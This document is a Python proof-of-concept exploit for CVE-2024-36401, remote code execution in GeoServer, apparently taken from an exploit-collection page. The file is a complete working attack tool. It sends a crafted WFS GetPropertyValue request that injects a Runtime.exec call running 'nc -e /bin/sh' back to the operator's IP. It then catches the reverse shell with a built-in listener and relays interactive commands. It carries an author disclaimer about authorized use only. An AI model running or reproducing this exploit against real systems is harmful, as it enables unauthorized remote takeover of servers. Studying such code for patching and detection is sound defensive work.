4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2024-36401.py PY
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Author: x.com/MohamedNab1l                                                                             
GitHub: https://github.com/bigb0x/CVE-2024-36401

About:
    POC for CVE-2024-36401: RCE in GeoServer versions prior to 2.25.1, 2.24.3 and 2.23.5. This POC is based on the security advisory by phith0n: https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401

Note:
    This POC will attempt to establish a reverse shell from vulnerable targets. It is aimed at Linux targets. You need a machine with a publicly accessible IP address in order to run this POC. This technique assumes that nc is available on the remote target.

Usage:
    python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Please feel free to contact me if you have any comments or suggestions.

Version: 1.0.3

References
    https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401

Disclaimer:
    I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.

"""
import requests
import argparse
import re
import os
import threading
import time
import socket
from urllib.parse import urlparse
import select

from urllib3.exceptions import InsecureRequestWarning

# Silence urllib3's InsecureRequestWarning; send_poc_request() posts with
# verify=False, which is the situation that warning is about.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


# ANSI color codes
# Escape sequences interpolated into console output; reset_color ends a
# colored span.
light_gray_color = '\033[37;1m'
dimmed_gray_color = '\033[90m'
honey_yellow_color = '\033[38;5;214m'
dim_yellow_color = "\033[33;1m"
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
reset_color = '\033[0m'

# Directory that create_log_dir() creates at startup.
# NOTE(review): no visible code writes into it -- confirm whether it is used.
LOG_DIR = "logs"

# THE_VERSION ="1.0.3"

def banner():
    """Print the colored ASCII-art banner and credit lines to stdout."""
    print(f'''{honey_yellow_color}
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓┏┓┏┓┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┣┓┃┃┃┫┃
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗┛┗╋┗┛┻
          
-> {light_gray_color}POC for CVE-2024-36401. Will try to obtain a shell on linux targets.{reset_color}
{honey_yellow_color}-> {light_gray_color}By: x.com/mohamednab1l
{honey_yellow_color}-> {honey_yellow_color}Use this wisely.{reset_color}
''')

def print_message(level, message):
    """Print a UTC-timestamped, color-tagged status line to stdout.

    Args:
        level: Severity selector. ``'info'``, ``'warning'`` and ``'error'``
            each get a colored tag. Any other value is printed with the
            timestamp only, rather than being dropped silently.
        message: Text to display.
    """
    current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
    if level == 'info':
        line = f"{current_time} {green_color}[INFO]{reset_color} {message}"
    elif level == 'warning':
        # The color spans the whole message here, not just the tag. The tag
        # text is kept verbatim so existing output does not change.
        line = f"{current_time} {honey_yellow_color}[VLUN] {message} {reset_color}"
    elif level == 'error':
        # A space separates the tag from the message, as in the other levels.
        line = f"{current_time} {red_color}[ERROR] {message}{reset_color} "
    else:
        # Unknown level: still show the message instead of losing it.
        line = f"{current_time} {message}"
    print(line)


def create_log_dir():
    """Create the ``LOG_DIR`` directory if it does not already exist.

    The "created" message is printed only when this call actually creates
    the directory.
    """
    try:
        # Attempt the creation directly instead of checking first, so there
        # is no window between the existence test and the mkdir.
        os.makedirs(LOG_DIR)
    except FileExistsError:
        # Already present (or created concurrently): nothing to do.
        return
    print_message('info', f"Log directory created: {LOG_DIR}")

def clean_host(url):
    """Return the host portion of *url* for use in a ``Host`` header.

    The network location is used when the URL has one; otherwise the path
    component is used. A leading ``www.`` and a single trailing ``/`` are
    removed from the result.
    """
    parts = urlparse(url)
    # Input without "//" has an empty netloc, so fall back to the path.
    candidate = parts.netloc if parts.netloc else parts.path
    if candidate.startswith('www.'):
        candidate = candidate[len('www.'):]
    # The regex is kept for the trailing slash so '$' semantics are unchanged.
    return re.sub(r'/$', '', candidate)


def send_poc_request(url, host, ip, port, type):
    """POST the WFS ``GetPropertyValue`` request to ``{url}/geoserver/wfs``.

    Args:
        url: Base URL of the target; ``/geoserver/wfs`` is appended as-is.
        host: Value sent in the ``Host`` header.
        ip: Address interpolated into the request body.
        port: Port interpolated into the request body.
        type: Value placed in the ``typeNames`` attribute of ``wfs:Query``.

    The response status code is printed. A 401, 403 or 404 is reported as
    "not vulnerable" and the process exits via ``exit()``. A
    ``requests`` exception is logged and the function returns normally.
    """
    # NOTE(review): the parameter name 'type' shadows the builtin; it is part
    # of the signature, so it is left unchanged.
    full_url = f"{url}/geoserver/wfs"
    headers = {
        "Host": host,
        "Accept-Encoding": "gzip, deflate, br",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/xml",
    }
    # XML body; {type}, {ip} and {port} are interpolated without escaping.
    custom_payload = f"""
        <wfs:GetPropertyValue service='WFS' version='2.0.0'
         xmlns:topp='http://www.openplans.org/topp'
         xmlns:fes='http://www.opengis.net/fes/2.0'
         xmlns:wfs='http://www.opengis.net/wfs/2.0'>
          <wfs:Query typeNames='{type}'/>
          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'nc -e /bin/sh {ip} {port}')</wfs:valueReference>
        </wfs:GetPropertyValue>
    """
    
    try:
        # verify=False skips TLS certificate verification; 30 s overall timeout.
        response = requests.post(full_url, headers=headers, data=custom_payload, timeout=30, verify=False)
        print_message('info', f"Response status code: {dim_yellow_color}{response.status_code}{reset_color}")
        if response.status_code in [401, 404, 403]:
            print_message('info', "Target is not vulnerable.")
            # NOTE(review): exit() is the helper installed by the site module;
            # sys.exit() is the conventional call -- confirm before changing.
            exit()
        else:
            print_message('info', "Request sent. Checking for incoming connections.")
    except requests.exceptions.RequestException as e:
        # Failure is only logged; the caller is not told the request failed.
        print_message('error', f"An error occurred: {e}")
        print_message('error', "Failed to send request!")

def receive_output(client_socket, timeout=5):
    """Collect data from *client_socket* until it goes quiet or closes.

    The socket is switched to non-blocking mode and left that way. Reading
    stops when no data has arrived for ``timeout`` seconds after the last
    chunk, when nothing at all has arrived for ``timeout * 2`` seconds, when
    the peer closes the connection, or on a socket error.

    Args:
        client_socket: Connected socket to read from.
        timeout: Idle time in seconds that ends the read once some data has
            been received; twice this value is allowed for the first chunk.

    Returns:
        The received bytes decoded as UTF-8 (undecodable bytes ignored) with
        surrounding whitespace stripped; ``''`` if nothing was received.
    """
    chunks = []
    client_socket.setblocking(False)
    last_activity = time.monotonic()
    while True:
        idle_limit = timeout if chunks else timeout * 2
        remaining = idle_limit - (time.monotonic() - last_activity)
        if remaining <= 0:
            break
        # Sleep in select() until data is readable instead of spinning on a
        # non-blocking recv().
        readable, _, _ = select.select([client_socket], [], [], remaining)
        if not readable:
            continue  # the deadline is re-evaluated at the top of the loop
        try:
            data = client_socket.recv(8192)
        except (BlockingIOError, InterruptedError):
            continue
        except OSError:
            # Connection-level failure: return what has been collected.
            break
        if not data:
            # An empty read means the peer closed; more data cannot arrive.
            break
        chunks.append(data)
        last_activity = time.monotonic()
    # Decode once so a multi-byte character split across reads is preserved.
    return b''.join(chunks).decode('utf-8', errors='ignore').strip()

def interactive_shell(client_socket):
    """Relay lines typed on stdin to a connected peer and print the replies.

    An initial ``id`` command is sent and its output printed. After that,
    each line read from the operator is sent followed by a newline, and
    whatever ``receive_output`` collects is printed. Typing ``exit`` (any
    case) or any exception inside the loop ends the session.

    Args:
        client_socket: Connected socket. It is closed before this function
            finishes, including when an error propagates.

    Raises:
        SystemExit: Always raised once the session has ended, which ends
            the calling thread (``listen`` does not catch it).
    """
    print_message('warning', "Nice!, we got a remote shell! :)")

    try:
        # sendall() so a short write cannot silently truncate the command.
        client_socket.sendall(b"id\n")
        time.sleep(1)
        output = receive_output(client_socket)
        if output:
            print_message('warning', "Checking the output of 'id' command:")
            print(f"{output}")
        else:
            print("No output received from 'id' command.")

        print_message('warning', "Shell established!.")
        print_message('warning', "Type commands and press enter to send, or type 'exit' to end the session.")

        while True:
            try:
                command = input(f"{honey_yellow_color}shell> {reset_color}")
                if command.lower() == 'exit':
                    break

                client_socket.sendall(command.encode() + b'\n')
                time.sleep(1)

                output = receive_output(client_socket)
                if output:
                    print(output)
                else:
                    print_message('warning', "No output received.")

            except Exception as e:
                print_message('error', f"Error in shell: {e}")
                break
    finally:
        # Close even when the initial probe fails, so the socket never leaks.
        client_socket.close()
        print_message('info', "Shell connection closed.")

    # Raised directly rather than via the site-provided exit(), which is not
    # always available and also closes stdin.
    raise SystemExit

def listen(ip, port, stop_event):
    """Accept TCP connections on ``(ip, port)`` until *stop_event* is set.

    Each accepted connection is handed to ``interactive_shell``. The
    listening socket uses a one-second accept timeout so *stop_event* is
    polled about once per second.

    Args:
        ip: Local address to bind.
        port: Local TCP port to bind.
        stop_event: ``threading.Event``; the accept loop ends once it is set.

    Errors, including a failed bind, are reported through ``print_message``
    and end the function. The listening socket is always closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Setup is inside the try so a bind failure is reported and the
        # socket is still closed by the finally clause.
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((ip, port))
        s.settimeout(1)
        s.listen(1)
        print_message('info', f"Listening on {ip}:{port}...")

        while not stop_event.is_set():
            try:
                client, (client_ip, client_port) = s.accept()
            except socket.timeout:
                # No connection within the timeout: re-check stop_event.
                continue
            print_message('info', f"Received connection from: {client_ip}:{client_port}")
            print_message('warning', "POC was successful!")

            interactive_shell(client)
    except Exception as e:
        print_message('error', f"An error occurred: {e}")
    finally:
        s.close()
        
def main():
    """Parse the command line, start the listener thread, send the request.

    Required options are ``-u`` (target URL), ``-ip`` and ``-port`` (local
    listener address) and ``-type`` (value for the request's ``typeNames``).
    The listener runs in a daemon thread. The request is sent only if that
    thread is still running after a one-second start-up delay. The function
    then waits until the listener thread ends or the user presses Ctrl-C.
    """
    banner()
    parser = argparse.ArgumentParser(description='POC for CVE-2024-36401')
    parser.add_argument('-u', required=True, help='Target, example https://target:8080')
    parser.add_argument('-ip', required=True, help='Your IP, example 192.168.1.1')
    # type=int makes argparse reject a non-numeric port with a usage error
    # instead of a ValueError traceback later on.
    parser.add_argument('-port', required=True, type=int, help='Port, example 1337')
    parser.add_argument('-type', required=True, help='Type, example sf:archsites')

    args = parser.parse_args()

    url = args.u
    ip = args.ip
    port = args.port
    feature_type = args.type  # local renamed so it does not shadow builtin type()
    host = clean_host(url)

    stop_event = threading.Event()

    listen_thread = threading.Thread(target=listen, args=(ip, port, stop_event))
    listen_thread.daemon = True
    listen_thread.start()

    # Give the listener a moment to bind before anything is sent.
    time.sleep(1)

    try:
        if not listen_thread.is_alive():
            # The listener already ended (e.g. the bind failed); sending the
            # request would be pointless.
            print_message('error', "Listener is not running; request not sent.")
        else:
            # Send the POST request
            send_poc_request(url, host, ip, port, feature_type)

            # Join in short slices so Ctrl-C is handled promptly.
            while listen_thread.is_alive():
                listen_thread.join(1)
    except KeyboardInterrupt:
        print_message('info', "Keyboard interrupt received. Cleaning up...")
    finally:
        stop_event.set()

        # The listener polls stop_event about once per second.
        listen_thread.join(timeout=5)

        if listen_thread.is_alive():
            print_message('warning', "Listen thread did not stop in time. It will be terminated.")

    print_message('info', "Script execution completed. Exiting...")

# Script entry point: create the log directory, then run the CLI.
if __name__ == "__main__":
    create_log_dir()
    main()